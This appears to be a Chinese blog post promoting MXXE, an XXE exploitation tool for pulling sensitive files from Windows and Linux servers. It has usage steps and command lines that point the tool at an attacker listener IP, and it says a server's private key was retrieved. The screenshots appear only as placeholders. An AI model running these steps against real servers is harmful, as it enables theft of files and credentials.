MXXE利用XXE漏洞快速获取服务器敏感文件工具

  • 开发
  • 17

https://github.com/MartinxMax/MXXE

关于

MXXEV1.2升级版,快速获取服务器敏感文件

获取Windows服务器敏感文件

image.png

把数据包复制到payload.txt进行自动注入

image.png

$ python3 MXXE.py -lh 10.10.16.5 -user Daniel -server windows

image.png

幸运的是我们找到了服务器的私匙

image.png

获取Linux服务器敏感文件

image.png

image.png

把数据包复制到payload.txt进行自动注入

image.png

标记注入点

$ python3 MXXE.py -lh 192.168.8.102 -user root -server linux

一些敏感文件保存在当前目录

image.png

image.png

阅读全部

相关推荐

  5. Xxe漏洞

    2024-04-20 15:00:08       18 阅读
  6. <span style='color:red;'>XXE</span><span style='color:red;'>漏洞</span>

    XXE漏洞

    2024-04-20 15:00:08      13 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-04-20 15:00:08       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-20 15:00:08       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-20 15:00:08       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-20 15:00:08       20 阅读

热门阅读

  1. SpringBoot上传文件夹

    2024-04-20 15:00:08       14 阅读

  2. [学习] linux命令大全

    2024-04-20 15:00:08       17 阅读

  4. 部署 Apache DolphinScheduler 集群在三台 CentOS 8 服务器上

    2024-04-20 15:00:08       17 阅读

  6. C 练习实例16

    2024-04-20 15:00:08       30 阅读

  7. C 语言实例 - 输出单个字符

    2024-04-20 15:00:08       19 阅读

  12. 阿里云大学考试python中级题目及解析-python高级

    2024-04-20 15:00:08       18 阅读

  21. opencv/cv.h: No such file or directory

    2024-04-20 15:00:08       12 阅读

  26. 从零手写实现 apache Tomcat-01-入门介绍

    2024-04-20 15:00:08       11 阅读

  27. ARM LPD-500 和PCK-600介绍

    2024-04-20 15:00:08       15 阅读

  30. 深入理解C#委托:为什么及如何使用委托

    2024-04-20 15:00:08       16 阅读